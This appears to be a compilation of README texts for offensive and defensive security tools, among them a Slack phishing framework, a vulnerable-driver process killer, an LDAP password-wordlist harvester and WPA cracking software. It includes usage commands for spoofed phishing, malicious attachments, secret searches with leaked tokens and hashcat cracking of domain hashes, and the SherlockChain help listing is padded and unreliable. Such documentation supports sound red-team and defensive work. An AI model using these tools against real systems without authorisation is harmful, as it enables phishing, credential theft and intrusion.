Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.
Site-wide Link Discovery:
Collects all links throughout the website based on the provided whitelist and the specified max_depth
.
Form and Input Extraction:
Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.
XSS Scanning:
Note:
The scanning functionality is currently inactive on SPA (Single Page Application) web applications, and we have only tested it on websites developed with PHP, yielding remarkable results. In the future, we plan to incorporate these features into the tool.
Note:
This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (
".css",".js",".mp4",".zip","png",".svg",".jpeg",".webp",".jpg",".gif"
). You can customize this list to better suit your needs by editing the setting.json file..
$ git clone https://github.com/joshkar/X-Recon
$ cd X-Recon
$ python3 -m pip install -r requirements.txt
$ python3 xr.py
You can use this address in the Get URL section
http://testphp.vulnweb.com
ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.
<binary>
: Path to the binary file for analysis.-s, --search SEARCH
: Optional. Search for specific instruction patterns.-f, --functions
: Optional. Print function names and addresses.python3 ropdump.py /path/to/binary
python3 ropdump.py /path/to/binary -s "pop eax"
python3 ropdump.py /path/to/binary -f
This is a simple SBOM utility which aims to provide an insider view on which packages are getting executed.
The process and objective is simple we can get a clear perspective view on the packages installed by APT (currently working on implementing this for RPM and other package managers). This is mainly needed to check which all packages are actually being executed.
The packages needed are mentioned in the requirements.txt
file and can be installed using pip:
pip3 install -r requirements.txt
Mount the image:
Currently I am still working on a mechanism to automatically define a mount point and mount different types of images and volumes but its still quite a task for me.Argument | Description |
---|---|
--analysis-mode | Specifies the mode of operation. Default is static . Choices are static and chroot . |
--static-type | Specifies the type of analysis for static mode. Required for static mode only. Choices are info and service . |
--volume-path | Specifies the path to the mounted volume. Default is /mnt . |
--save-file | Specifies the output file for JSON output. |
--info-graphic | Specifies whether to generate visual plots for CHROOT analysis. Default is True . |
--pkg-mgr | Manually specify the package manager or dont add this option for automatic check. |
APT: | |
- Static Info Analysis: | |
- This command runs the program in static analysis mode, specifically using the Info Directory analysis method. | |
- It analyzes the packages installed on the mounted volume located at /mnt . | |
- It saves the output in a JSON file named output.json . | |
- It generates visual plots for CHROOT analysis. |
```bash
python3 main.py --pkg-mgr apt --analysis-mode static --static-type info --volume-path /mnt --save-file output.json
```
Static Service Analysis:
This command runs the program in static analysis mode, specifically using the Service file analysis method.
/custom_mount
.output.json
.It does not generate visual plots for CHROOT analysis. bash python3 main.py --pkg-mgr apt --analysis-mode static --static-type service --volume-path /custom_mount --save-file output.json --info-graphic False
Chroot analysis with or without Graphic output:
/mnt
.output.json
.--info-graphic
as True
else False
bash python3 main.py --pkg-mgr apt --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
RPM - Static Analysis: - Similar to how its done on apt but there is only one type of static scan avaialable for now. bash python3 main.py --pkg-mgr rpm --analysis-mode static --volume-path /mnt --save-file output.json
bash python3 main.py --pkg-mgr rpm --analysis-mode chroot --volume-path /mnt --save-file output.json --info-graphic True/False
Currently the tool works on Debian and Red Hat based images I can guarentee the debian outputs but the Red-Hat onces still needs work to be done its not perfect.
I am working on the pacman side of things I am trying to find a relaiable way of accessing the pacman db for static analysis.
For the workings and process related documentation please read the wiki page: Link
Ideas regarding this topic are welcome in the discussions page.
A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.
This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.
Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.
In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)
EvilSlackbot requires python3 and Slackclient
pip3 install slackclient
usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]
options:
-h, --help show this help message and exit
Required:
-t TOKEN, --token TOKEN
Slack Oauth token
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels
To use this tool, you must provide a xoxb or xoxp token.
Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>
Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)
With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.
python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>
With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels
With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.
python3 EvilSlackbot.py -t <xoxb token> -cL
Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate, vulnerable driver into a target system, which allows attackers to exploit the driver to perform malicious actions.
Reaper was specifically designed to exploit the vulnerability present in the kprocesshacker.sys driver in version 2.8.0.0, taking advantage of its weaknesses to gain privileged access and control over the target system.
Note: Reaper does not kill the Windows Defender process, as it has a protection, Reaper is a simple proof of concept.
____
/ __ \___ ____ _____ ___ _____
/ /_/ / _ \/ __ `/ __ \/ _ \/ ___/
/ _, _/ __/ /_/ / /_/ / __/ /
/_/ |_|\___/\__,_/ .___/\___/_/
/_/
[Coded by MrEmpy]
[v1.0]
Usage: C:\Windows\Temp\Reaper.exe [OPTIONS] [VALUES]
Options:
sp, suspend process
kp, kill process
Values:
PROCESSID process id to suspend/kill
Examples:
Reaper.exe sp 1337
Reaper.exe kp 1337
You can compile it directly from the source code or download it already compiled. You will need Visual Studio 2022 to compile.
Note: The executable and driver must be in the same directory.
Howdy! My name is Harrison Richardson, or rs0n
(arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.
The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make ๐ฐ doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.
In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py
or slowburn.py
) is basically an algorithm that runs the Modules (Ex: fire-starter.py
or fire-scanner.py
) in a specific patter for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.
My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!
Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:
sudo apt update && sudo apt-get update
sudo apt -y upgrade && sudo apt-get -y upgrade
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
cd ars0n-framework
./install.sh
wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
rm ars0n-framework-v0.0.2-alpha.tar.gz
The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.
Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.3. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.
./install.sh
This video shows exactly what to expect from a successful installation.
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./install.sh --arm
You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys
directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.
Once the installation is complete, you will be given the option to run the application by entering Y
. If you choose not the run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directly and run the run.sh
bash script.
./run.sh
If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts
./run.sh --arm
The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.
At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.
How it works:
Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.
Also, please note that most data will not show in the GUI until the scan has completed. It's best to try and run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has complete to move from Recon to Enumeration.
Running Wildfire:
Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.
Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan form the CLI.
All Core Modules for The Ars0n Framework are stored in the /toolkit
directory. Simply navigate to the directory and run wildfire.py
with the necessary flags. At least one Sub-Module flag must be provided.
python3 wildfire.py --start --cloud --scan
Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.
Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.
In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various API's and deposits them into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.
To initalize Slowburn, simply run the following command:
python3 slowburn.py --initialize
Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.
Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.
If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:
python3 slowburn.py
The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.
Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.
Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASN's to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:
These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.
Once the scan is complete, the Dashboard will be updated and available to the user.
Most Sub-Modules in The Ars0n Framework requre the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
Coming soon...
Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.
At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.
It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools have their own ways of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why running The Ars0n Framework should only be run on a clean installation of Kali Linux.
Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
Coming soon...
To install headerpwn
, run the following command:
go install github.com/devanshbatham/headerpwn@v0.0.3
headerpwn allows you to test various headers on a target URL and analyze the responses. Here's how to use the tool:
-url
flag.-headers
flag to specify the path to this file.Example usage:
headerpwn -url https://example.com -headers my_headers.txt
my_headers.txt
should be like below:Proxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar
Follow following steps to proxy requests through Burp Suite:
Export Burp's Certificate:
127.0.0.1:8080
Install Burp's Certificate:
You should be all set:
headerpwn -url https://example.com -headers my_headers.txt -proxy 127.0.0.1:8080
The headers.txt
file is compiled from various sources, including the SecLists">Seclists project. These headers are used for testing purposes and provide a variety of scenarios for analyzing how servers respond to different headers.
A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.
ย
The bigger the domain is, the better the wordlist will be.
name
and sAMAccountName
name
and sAMAccountName
name
name
name
and descriptions
descriptions
--outputfile
To generate a wordlist from the LDAP of the domain domain.local
you can use this command:
./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101
You will get the following output if using the Python version:
You will get the following output if using the Powershell version:
Once you have this wordlist, you should crack your NTDS using hashcat, --loopback
and the rule clem9669_large.rule.
./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback
$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_
usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.
Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP
Credentials:
--no- pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help
command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:
Vulnerability Detection: The --detect
and --exclude-detectors
options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
--report-format
, --report-output
, and various --report-*
options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).--filter-*
options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.--ai-*
options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.--truffle
and --truffle-build-directory
facilitate the integration of SherlockChain into popular development frameworks like Truffle.The --help
command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
--detect
, --exclude-detectors
--report-format
, --report-output
, --report-*
--filter-*
--ai-*
--truffle
, --truffle-build-directory
--compile
, --list-detectors
, --list-detectors-info
By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
Num | Detector | What it Detects | Impact | Confidence |
---|---|---|---|---|
1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
## Detectors |
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
Current features (v1.0.1)- - Subdomain enumeration (2 engines + bruteforcing) - User-friendly output - Resolving A records (IPv4)
A few features are work in progress. See Planned features for more details.
The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.
You can build this repo from source- - Clone the repository
git clone git@github.com:pptx704/domainim
nimble build
./domainim <domain> [--ports=<ports>]
Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.
